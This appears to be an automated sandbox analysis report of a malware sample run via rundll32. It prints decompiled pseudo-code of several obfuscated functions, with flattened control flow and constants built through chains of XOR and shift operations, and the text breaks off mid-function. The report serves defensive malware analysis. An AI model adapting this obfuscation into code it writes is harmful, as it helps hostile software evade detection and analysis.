                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: State$LongMessageSendWindow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1063413437-0
                                                                                                                                                            • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                                            • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                                                            • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                                            • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003820BA Relevance: 5.2, Strings: 4, Instructions: 240COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                            			E003820BA() {
				char _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t227;
				intOrPtr _t228;
				signed int _t230;
				void* _t231;
				intOrPtr _t235;
				intOrPtr _t245;
				void* _t247;
				intOrPtr _t254;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t277;
				signed int* _t279;
				void* _t283;

				_t279 =  &_v624;
				_v612 = 0x15bebb;
				_v612 = _v612 ^ 0x0c09d82a;
				_t247 = 0x7e01d7;
				_v612 = _v612 + 0xffff69e9;
				_v612 = _v612 ^ 0xcffb1e8d;
				_v612 = _v612 ^ 0xc3e0ceeb;
				_v596 = 0xb5bc7f;
				_v596 = _v596 << 0xa;
				_v596 = _v596 + 0xbaa7;
				_v596 = _v596 ^ 0xd6f2b68e;
				_v600 = 0x5909af;
				_v600 = _v600 ^ 0x0096463d;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x0016e9cd;
				_v548 = 0x801d18;
				_v548 = _v548 + 0xffffc800;
				_v548 = _v548 ^ 0x0070ca5a;
				_v580 = 0x2361dd;
				_v580 = _v580 * 0x6f;
				_t277 = 0;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0xdbb34e1e;
				_v528 = 0x864281;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0000b217;
				_v560 = 0x478502;
				_v560 = _v560 | 0x3d47d1eb;
				_v560 = _v560 ^ 0x3d4c1a49;
				_v540 = 0x8f961f;
				_v540 = _v540 >> 0xc;
				_v540 = _v540 ^ 0x000d133d;
				_v572 = 0xef4b2;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff85b1;
				_v572 = _v572 ^ 0xde949f86;
				_v608 = 0x8e969a;
				_v608 = _v608 << 0xd;
				_t272 = 0x21;
				_v608 = _v608 / _t272;
				_t273 = 0x2f;
				_v608 = _v608 / _t273;
				_v608 = _v608 ^ 0x002a10b8;
				_v620 = 0x864bbd;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0x87ba;
				_v620 = _v620 + 0x936f;
				_v620 = _v620 ^ 0x4bb78bcc;
				_v564 = 0xfb8a17;
				_t274 = 0x62;
				_v564 = _v564 * 0x63;
				_v564 = _v564 ^ 0x61429d97;
				_v576 = 0x222f;
				_v576 = _v576 >> 4;
				_v576 = _v576 ^ 0xf39884cf;
				_v576 = _v576 ^ 0xf39d4647;
				_v556 = 0x6068cb;
				_v556 = _v556 ^ 0xfe1a734d;
				_v556 = _v556 ^ 0xfe79d9b4;
				_v616 = 0xc46e23;
				_v616 = _v616 >> 2;
				_v616 = _v616 / _t274;
				_v616 = _v616 * 0x76;
				_v616 = _v616 ^ 0x003e2a5a;
				_v624 = 0x4617e4;
				_v624 = _v624 + 0xffff4d74;
				_v624 = _v624 ^ 0x9dcdfd87;
				_v624 = _v624 + 0x3fd8;
				_v624 = _v624 ^ 0x9d89a5c2;
				_v588 = 0x3a0167;
				_v588 = _v588 << 1;
				_v588 = _v588 + 0xffff1a51;
				_v588 = _v588 ^ 0x00728a40;
				_v532 = 0x3a363e;
				_v532 = _v532 ^ 0xe52a74a2;
				_v532 = _v532 ^ 0xe514694b;
				_v544 = 0x52d5cb;
				_v544 = _v544 | 0x185d0a08;
				_v544 = _v544 ^ 0x18524fe5;
				_v584 = 0x37b3aa;
				_v584 = _v584 + 0xebef;
				_t275 = 0x72;
				_v584 = _v584 * 0x28;
				_v584 = _v584 ^ 0x08d0b087;
				_v592 = 0xa4bebe;
				_v592 = _v592 >> 8;
				_v592 = _v592 | 0x739fbd45;
				_v592 = _v592 ^ 0x739593e3;
				_v552 = 0x17b1c;
				_v552 = _v552 << 0xe;
				_v552 = _v552 ^ 0x5ecd7403;
				_v568 = 0x403d75;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0x80b15bc0;
				_v568 = _v568 ^ 0x80b9a416;
				_v536 = 0x2ed64e;
				_t276 = _v524;
				_v536 = _v536 / _t275;
				_v536 = _v536 ^ 0x00033d67;
				_v604 = 0x8b403d;
				_v604 = _v604 + 0xffff3866;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x8a7a6cd3;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t247 - 0x73dad95;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E0038DA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
							_t235 = E00372051(_v536,  &_v520, _v604);
							_t254 =  *0x393e10; // 0x0
							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
						} else {
							if(_t247 == 0x7e01d7) {
								_push(_t247);
								_push(_t247);
								 *0x393e10 = E00377FF2(0x45c);
								_t247 = 0x8643fcd;
								continue;
							} else {
								if(_t247 == 0xd34913) {
									_t247 = 0x148c4fa;
									_v524 = _v596;
									continue;
								} else {
									if(_t247 == 0xfeb697) {
										_v524 = _v612;
										goto L8;
									} else {
										if(_t247 != 0x148c4fa) {
											goto L20;
										} else {
											E00388F9E(_v620, _v564, _v576, _v556, _t276);
											_t279 =  &(_t279[3]);
											L8:
											_t247 = 0xac90332;
											continue;
										}
									}
								}
							}
						}
						L23:
						return _t277;
					}
					__eflags = _t247 - 0x8643fcd;
					if(_t247 == 0x8643fcd) {
						_t227 = E0037912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
						_t276 = _t227;
						_t279 =  &(_t279[5]);
						__eflags = _t227;
						if(__eflags == 0) {
							_t247 = 0xfeb697;
							goto L20;
						} else {
							_t245 =  *0x393e10; // 0x0
							 *((intOrPtr*)(_t245 + 0x450)) = 1;
							_t247 = 0xd34913;
							goto L1;
						}
					} else {
						__eflags = _t247 - 0xac90332;
						if(_t247 == 0xac90332) {
							_push(_v532);
							_push(_v524);
							_push(_v588);
							_t228 =  *0x393e10; // 0x0
							_push(_t228 + 0x23c);
							_t230 = E003846BB(_v616, _v624);
							_t279 = _t279 - 0xc + 0x1c;
							_t247 = 0xe2d9513;
							__eflags = _t230;
							_t231 = 1;
							_t277 =  ==  ? _t231 : _t277;
							goto L1;
						} else {
							__eflags = _t247 - 0xe2d9513;
							if(_t247 != 0xe2d9513) {
								goto L20;
							} else {
								E0037A55F();
								_t247 = 0x73dad95;
								goto L1;
							}
						}
					}
					goto L23;
					L20:
					__eflags = _t247 - 0x13a2d4a;
				} while (__eflags != 0);
				goto L23;
			}













































                                                                                                                                                            0x003820ba
                                                                                                                                                            0x003820c0
                                                                                                                                                            0x003820ca
                                                                                                                                                            0x003820d2
                                                                                                                                                            0x003820d7
                                                                                                                                                            0x003820df
                                                                                                                                                            0x003820e7
                                                                                                                                                            0x003820ef
                                                                                                                                                            0x003820f7
                                                                                                                                                            0x003820fc
                                                                                                                                                            0x00382104
                                                                                                                                                            0x0038210c
                                                                                                                                                            0x00382114
                                                                                                                                                            0x0038211c
                                                                                                                                                            0x00382121
                                                                                                                                                            0x00382129
                                                                                                                                                            0x00382131
                                                                                                                                                            0x00382139
                                                                                                                                                            0x00382141
                                                                                                                                                            0x00382152
                                                                                                                                                            0x00382156
                                                                                                                                                            0x00382158
                                                                                                                                                            0x0038215d
                                                                                                                                                            0x00382165
                                                                                                                                                            0x0038216d
                                                                                                                                                            0x00382172
                                                                                                                                                            0x0038217a
                                                                                                                                                            0x00382182
                                                                                                                                                            0x0038218a
                                                                                                                                                            0x00382192
                                                                                                                                                            0x0038219a
                                                                                                                                                            0x0038219f
                                                                                                                                                            0x003821a7
                                                                                                                                                            0x003821af
                                                                                                                                                            0x003821b4
                                                                                                                                                            0x003821bc
                                                                                                                                                            0x003821c4
                                                                                                                                                            0x003821cc
                                                                                                                                                            0x003821d7
                                                                                                                                                            0x003821dc
                                                                                                                                                            0x003821e6
                                                                                                                                                            0x003821eb
                                                                                                                                                            0x003821f1
                                                                                                                                                            0x003821f9
                                                                                                                                                            0x00382201
                                                                                                                                                            0x00382206
                                                                                                                                                            0x0038220e
                                                                                                                                                            0x00382216
                                                                                                                                                            0x0038221e
                                                                                                                                                            0x0038222b
                                                                                                                                                            0x0038222c
                                                                                                                                                            0x00382230
                                                                                                                                                            0x00382238
                                                                                                                                                            0x00382240
                                                                                                                                                            0x00382245
                                                                                                                                                            0x0038224d
                                                                                                                                                            0x00382255
                                                                                                                                                            0x0038225d
                                                                                                                                                            0x00382265
                                                                                                                                                            0x0038226d
                                                                                                                                                            0x00382275
                                                                                                                                                            0x00382280
                                                                                                                                                            0x00382289
                                                                                                                                                            0x0038228d
                                                                                                                                                            0x00382297
                                                                                                                                                            0x003822a4
                                                                                                                                                            0x003822b1
                                                                                                                                                            0x003822b9
                                                                                                                                                            0x003822c1
                                                                                                                                                            0x003822c9
                                                                                                                                                            0x003822d1
                                                                                                                                                            0x003822d5
                                                                                                                                                            0x003822dd
                                                                                                                                                            0x003822e5
                                                                                                                                                            0x003822ed
                                                                                                                                                            0x003822f5
                                                                                                                                                            0x003822fd
                                                                                                                                                            0x00382305
                                                                                                                                                            0x0038230d
                                                                                                                                                            0x00382315
                                                                                                                                                            0x0038231d
                                                                                                                                                            0x0038232c
                                                                                                                                                            0x0038232d
                                                                                                                                                            0x00382331
                                                                                                                                                            0x00382339
                                                                                                                                                            0x00382341
                                                                                                                                                            0x00382346
                                                                                                                                                            0x0038234e
                                                                                                                                                            0x00382356
                                                                                                                                                            0x0038235e
                                                                                                                                                            0x00382363
                                                                                                                                                            0x0038236b
                                                                                                                                                            0x00382373
                                                                                                                                                            0x00382378
                                                                                                                                                            0x00382380
                                                                                                                                                            0x00382388
                                                                                                                                                            0x00382396
                                                                                                                                                            0x0038239a
                                                                                                                                                            0x0038239e
                                                                                                                                                            0x003823a6
                                                                                                                                                            0x003823ae
                                                                                                                                                            0x003823b6
                                                                                                                                                            0x003823bb
                                                                                                                                                            0x003823bb
                                                                                                                                                            0x003823c3
                                                                                                                                                            0x003823c3
                                                                                                                                                            0x003823c3
                                                                                                                                                            0x003823c3
                                                                                                                                                            0x003823c5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823cb
                                                                                                                                                            0x00382519
                                                                                                                                                            0x00382532
                                                                                                                                                            0x00382537
                                                                                                                                                            0x00382540
                                                                                                                                                            0x003823d1
                                                                                                                                                            0x003823d7
                                                                                                                                                            0x0038243c
                                                                                                                                                            0x0038243d
                                                                                                                                                            0x00382445
                                                                                                                                                            0x0038244a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823d9
                                                                                                                                                            0x003823df
                                                                                                                                                            0x00382420
                                                                                                                                                            0x00382425
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823e1
                                                                                                                                                            0x003823e7
                                                                                                                                                            0x00382416
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823e9
                                                                                                                                                            0x003823ef
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823f5
                                                                                                                                                            0x00382406
                                                                                                                                                            0x0038240b
                                                                                                                                                            0x0038240e
                                                                                                                                                            0x0038240e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038240e
                                                                                                                                                            0x003823ef
                                                                                                                                                            0x003823e7
                                                                                                                                                            0x003823df
                                                                                                                                                            0x003823d7
                                                                                                                                                            0x00382544
                                                                                                                                                            0x0038254f
                                                                                                                                                            0x0038254f
                                                                                                                                                            0x00382454
                                                                                                                                                            0x0038245a
                                                                                                                                                            0x003824ca
                                                                                                                                                            0x003824cf
                                                                                                                                                            0x003824d1
                                                                                                                                                            0x003824d4
                                                                                                                                                            0x003824d6
                                                                                                                                                            0x003824f0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003824d8
                                                                                                                                                            0x003824d8
                                                                                                                                                            0x003824e0
                                                                                                                                                            0x003824e6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003824e6
                                                                                                                                                            0x0038245c
                                                                                                                                                            0x0038245c
                                                                                                                                                            0x0038245e
                                                                                                                                                            0x00382478
                                                                                                                                                            0x0038247c
                                                                                                                                                            0x00382480
                                                                                                                                                            0x00382484
                                                                                                                                                            0x00382499
                                                                                                                                                            0x0038249a
                                                                                                                                                            0x0038249f
                                                                                                                                                            0x003824a2
                                                                                                                                                            0x003824a7
                                                                                                                                                            0x003824ab
                                                                                                                                                            0x003824ac
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00382460
                                                                                                                                                            0x00382460
                                                                                                                                                            0x00382466
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038246c
                                                                                                                                                            0x0038246c
                                                                                                                                                            0x00382471
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00382471
                                                                                                                                                            0x00382466
                                                                                                                                                            0x0038245e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003824f5
                                                                                                                                                            0x003824f5
                                                                                                                                                            0x003824f5
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: /"$>6:$Z*>$u=@
                                                                                                                                                            • API String ID: 0-89199335
                                                                                                                                                            • Opcode ID: ed08642f4bb213059c3c234f66e63ea6551c3a9d2ae31ea333db936d1f5841bd
                                                                                                                                                            • Instruction ID: 404113286a395cca7a1a11d421a3d1f1f14bf0ea52a699ebc4e3ae9fab03f1c2
                                                                                                                                                            • Opcode Fuzzy Hash: ed08642f4bb213059c3c234f66e63ea6551c3a9d2ae31ea333db936d1f5841bd
                                                                                                                                                            • Instruction Fuzzy Hash: EFB101711083809FC369DF66C48A81BFBE1FBD4748F20991DF6A686261D3B58949CF92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00375548 Relevance: 5.2, Strings: 4, Instructions: 233COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E00375548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v24;
				char _v28;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* __ecx;
				void* _t190;
				void* _t206;
				void* _t208;
				signed int _t209;
				char* _t211;
				signed int _t212;
				intOrPtr _t222;
				intOrPtr* _t225;
				void* _t227;
				char* _t229;
				char _t233;
				intOrPtr _t255;
				intOrPtr* _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int* _t263;

				_t225 = _a16;
				_t257 = _a4;
				_push(_t225);
				_push(_a12);
				_push(_a8);
				_push(_t257);
				_push(__edx);
				E003820B9(_t190);
				_v56 = 0xb9e7cb;
				_t255 = 0;
				_v52 = 0x6e87b5;
				_t263 =  &(( &_v148)[6]);
				_v48 = 0;
				_v44 = 0;
				_t227 = 0x3ccc1e9;
				_v128 = 0x85629b;
				_t258 = 0x62;
				_v128 = _v128 * 0x5a;
				_v128 = _v128 + 0xfbaf;
				_v128 = _v128 ^ 0x2ee5a62d;
				_v144 = 0xfc0c7f;
				_v144 = _v144 ^ 0xfdfaf442;
				_v144 = _v144 >> 1;
				_v144 = _v144 | 0x14143ad1;
				_v144 = _v144 ^ 0x7e977ecf;
				_v96 = 0xd1f565;
				_v96 = _v96 * 0x21;
				_v96 = _v96 ^ 0x1b12de47;
				_v104 = 0xb219e8;
				_v104 = _v104 | 0x75a31cc8;
				_v104 = _v104 ^ 0x75be6df4;
				_v80 = 0x6fb9b6;
				_v80 = _v80 * 0x3e;
				_v80 = _v80 ^ 0x1b001c4a;
				_v132 = 0x1154a0;
				_v132 = _v132 << 0xb;
				_v132 = _v132 + 0xfffffde8;
				_v132 = _v132 | 0xd1d436bb;
				_v132 = _v132 ^ 0xdbfeae5a;
				_v76 = 0x5374cd;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x0147cb67;
				_v140 = 0x35e68a;
				_v140 = _v140 + 0xffff467d;
				_v140 = _v140 * 0x7c;
				_v140 = _v140 ^ 0x566bba39;
				_v140 = _v140 ^ 0x4faa8078;
				_v124 = 0xf91357;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xf2e4;
				_v124 = _v124 ^ 0x89afe8a4;
				_v112 = 0xf055e4;
				_v112 = _v112 ^ 0x101963ca;
				_v112 = _v112 | 0x7be8ad21;
				_v112 = _v112 ^ 0x7be17431;
				_v84 = 0x17393b;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x05c81c43;
				_v120 = 0xf688ab;
				_v120 = _v120 / _t258;
				_v120 = _v120 * 0x2d;
				_v120 = _v120 ^ 0x00718a36;
				_v116 = 0xa21f51;
				_v116 = _v116 + 0x3c3b;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0006c391;
				_v88 = 0x51e239;
				_v88 = _v88 + 0x2ec0;
				_v88 = _v88 ^ 0x0058dd2b;
				_v136 = 0xa92d92;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0647b396;
				_v136 = _v136 ^ 0x20b7ff2f;
				_v136 = _v136 ^ 0x26fd7475;
				_v108 = 0xb50576;
				_t259 = 0x45;
				_v108 = _v108 / _t259;
				_v108 = _v108 ^ 0xb94dc178;
				_v108 = _v108 ^ 0xb943792d;
				_v148 = 0xb9b260;
				_t260 = 0x14;
				_v148 = _v148 / _t260;
				_v148 = _v148 * 0x3f;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x009e914b;
				_v92 = 0x6e7d65;
				_v92 = _v92 | 0xb573042f;
				_v92 = _v92 ^ 0xb570b7bc;
				_v100 = 0xfd8f7e;
				_v100 = _v100 * 0x5d;
				_v100 = _v100 ^ 0x5c1db3f3;
				L1:
				while(_t227 != 0x3c16ad4) {
					if(_t227 == 0x3ccc1e9) {
						_t227 = 0x7dbf5b4;
						continue;
					}
					if(_t227 == 0x79abc1a) {
						_t229 =  &_v28;
						_t208 = E0037AEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
						_t263 =  &(_t263[4]);
						if(_t208 != 0) {
							_push(_t229);
							_push(_t229);
							_t222 = E00377FF2(_v24);
							 *_t257 = _t222;
							if(_t222 != 0) {
								E0037ED7E(_v108,  *_t257, _v148, _v28, _v24);
								_t263 =  &(_t263[3]);
								 *((intOrPtr*)(_t257 + 4)) = _v24;
								_t255 = 1;
							}
						}
						_t227 = 0xdaef9d5;
						continue;
					}
					if(_t227 == 0x7dbf5b4) {
						_t209 =  *((intOrPtr*)(_t225 + 4));
						_t233 =  *_t225;
						_v68 = _t209;
						_v72 = _t233;
						_t211 = _t209 - 1 + _t233;
						while(_t211 > _t233) {
							if( *_t211 == 0) {
								break;
							}
							_t211 = _t211 - 1;
						}
						_t212 = _t211 - _t233;
						_v68 = _t212;
						if(_t212 == 0) {
							L16:
							_t227 = 0xfc35b14;
							continue;
						}
						while(_v68 % _v144 != _v128) {
							_t163 =  &_v68;
							 *_t163 = _v68 - 1;
							if( *_t163 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t227 == 0xdaef9d5) {
						E00388519(_v92, _v100, _v64);
						L28:
						return _t255;
					}
					if(_t227 != 0xfc35b14) {
						L25:
						if(_t227 != 0xb843ed5) {
							continue;
						}
						goto L28;
					}
					if(E00375E60( &_v72, _v96, _v104,  &_v64) == 0) {
						goto L28;
					}
					_t227 = 0x3c16ad4;
				}
				_t206 = E00378B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
				_t263 =  &(_t263[4]);
				if(_t206 == 0) {
					_t227 = 0xdaef9d5;
					goto L25;
				}
				_t227 = 0x79abc1a;
				goto L1;
			}



















































                                                                                                                                                            0x0037554f
                                                                                                                                                            0x00375558
                                                                                                                                                            0x00375560
                                                                                                                                                            0x00375561
                                                                                                                                                            0x00375568
                                                                                                                                                            0x0037556f
                                                                                                                                                            0x00375570
                                                                                                                                                            0x00375572
                                                                                                                                                            0x00375577
                                                                                                                                                            0x00375582
                                                                                                                                                            0x00375584
                                                                                                                                                            0x0037558f
                                                                                                                                                            0x00375592
                                                                                                                                                            0x00375598
                                                                                                                                                            0x0037559c
                                                                                                                                                            0x003755a1
                                                                                                                                                            0x003755b0
                                                                                                                                                            0x003755b1
                                                                                                                                                            0x003755b5
                                                                                                                                                            0x003755bd
                                                                                                                                                            0x003755c5
                                                                                                                                                            0x003755cd
                                                                                                                                                            0x003755d5
                                                                                                                                                            0x003755d9
                                                                                                                                                            0x003755e1
                                                                                                                                                            0x003755e9
                                                                                                                                                            0x003755f6
                                                                                                                                                            0x003755fa
                                                                                                                                                            0x00375602
                                                                                                                                                            0x0037560a
                                                                                                                                                            0x00375612
                                                                                                                                                            0x0037561a
                                                                                                                                                            0x00375627
                                                                                                                                                            0x0037562b
                                                                                                                                                            0x00375633
                                                                                                                                                            0x0037563b
                                                                                                                                                            0x00375640
                                                                                                                                                            0x00375648
                                                                                                                                                            0x00375650
                                                                                                                                                            0x00375658
                                                                                                                                                            0x00375660
                                                                                                                                                            0x00375665
                                                                                                                                                            0x0037566d
                                                                                                                                                            0x00375675
                                                                                                                                                            0x00375682
                                                                                                                                                            0x00375686
                                                                                                                                                            0x0037568e
                                                                                                                                                            0x00375696
                                                                                                                                                            0x0037569e
                                                                                                                                                            0x003756a3
                                                                                                                                                            0x003756ab
                                                                                                                                                            0x003756b3
                                                                                                                                                            0x003756bb
                                                                                                                                                            0x003756c3
                                                                                                                                                            0x003756cb
                                                                                                                                                            0x003756d3
                                                                                                                                                            0x003756db
                                                                                                                                                            0x003756e0
                                                                                                                                                            0x003756e8
                                                                                                                                                            0x003756f6
                                                                                                                                                            0x003756ff
                                                                                                                                                            0x00375703
                                                                                                                                                            0x0037570b
                                                                                                                                                            0x00375713
                                                                                                                                                            0x0037571b
                                                                                                                                                            0x00375720
                                                                                                                                                            0x00375728
                                                                                                                                                            0x00375730
                                                                                                                                                            0x0037573a
                                                                                                                                                            0x00375742
                                                                                                                                                            0x0037574a
                                                                                                                                                            0x0037574f
                                                                                                                                                            0x00375757
                                                                                                                                                            0x0037575f
                                                                                                                                                            0x00375767
                                                                                                                                                            0x00375775
                                                                                                                                                            0x0037577a
                                                                                                                                                            0x00375780
                                                                                                                                                            0x00375788
                                                                                                                                                            0x00375790
                                                                                                                                                            0x0037579c
                                                                                                                                                            0x003757a4
                                                                                                                                                            0x003757ad
                                                                                                                                                            0x003757b1
                                                                                                                                                            0x003757b6
                                                                                                                                                            0x003757be
                                                                                                                                                            0x003757c6
                                                                                                                                                            0x003757ce
                                                                                                                                                            0x003757d6
                                                                                                                                                            0x003757e3
                                                                                                                                                            0x003757e7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003757ef
                                                                                                                                                            0x00375801
                                                                                                                                                            0x0037591d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037591d
                                                                                                                                                            0x0037580d
                                                                                                                                                            0x003758ac
                                                                                                                                                            0x003758bb
                                                                                                                                                            0x003758c0
                                                                                                                                                            0x003758c5
                                                                                                                                                            0x003758da
                                                                                                                                                            0x003758db
                                                                                                                                                            0x003758dc
                                                                                                                                                            0x003758e1
                                                                                                                                                            0x003758e7
                                                                                                                                                            0x00375901
                                                                                                                                                            0x0037590f
                                                                                                                                                            0x00375912
                                                                                                                                                            0x00375915
                                                                                                                                                            0x00375915
                                                                                                                                                            0x003758e7
                                                                                                                                                            0x00375916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375916
                                                                                                                                                            0x00375819
                                                                                                                                                            0x00375856
                                                                                                                                                            0x00375859
                                                                                                                                                            0x0037585b
                                                                                                                                                            0x00375860
                                                                                                                                                            0x00375864
                                                                                                                                                            0x0037586e
                                                                                                                                                            0x0037586b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037586d
                                                                                                                                                            0x0037586d
                                                                                                                                                            0x00375872
                                                                                                                                                            0x00375874
                                                                                                                                                            0x00375878
                                                                                                                                                            0x00375892
                                                                                                                                                            0x00375892
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375892
                                                                                                                                                            0x0037587a
                                                                                                                                                            0x0037588c
                                                                                                                                                            0x0037588c
                                                                                                                                                            0x00375890
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375890
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037587a
                                                                                                                                                            0x0037581d
                                                                                                                                                            0x00375975
                                                                                                                                                            0x0037597b
                                                                                                                                                            0x00375987
                                                                                                                                                            0x00375987
                                                                                                                                                            0x00375829
                                                                                                                                                            0x0037595b
                                                                                                                                                            0x00375961
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375967
                                                                                                                                                            0x00375849
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037584f
                                                                                                                                                            0x0037584f
                                                                                                                                                            0x00375943
                                                                                                                                                            0x00375948
                                                                                                                                                            0x0037594d
                                                                                                                                                            0x00375959
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375959
                                                                                                                                                            0x0037594f
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 1t{$9Q$;<$e}n
                                                                                                                                                            • API String ID: 0-2095593254
                                                                                                                                                            • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                                            • Instruction ID: 35bffac80f40563ef471ffde65251e8c3f69cb80f1ae6c56e40d5de78e031b96
                                                                                                                                                            • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                                            • Instruction Fuzzy Hash: 98B140B1108381DFC329CF22C58591BBBE1FBD5748F50891DF69A9A260D7B58A4ACF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00387DD5 Relevance: 5.2, Strings: 4, Instructions: 226COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E00387DD5() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
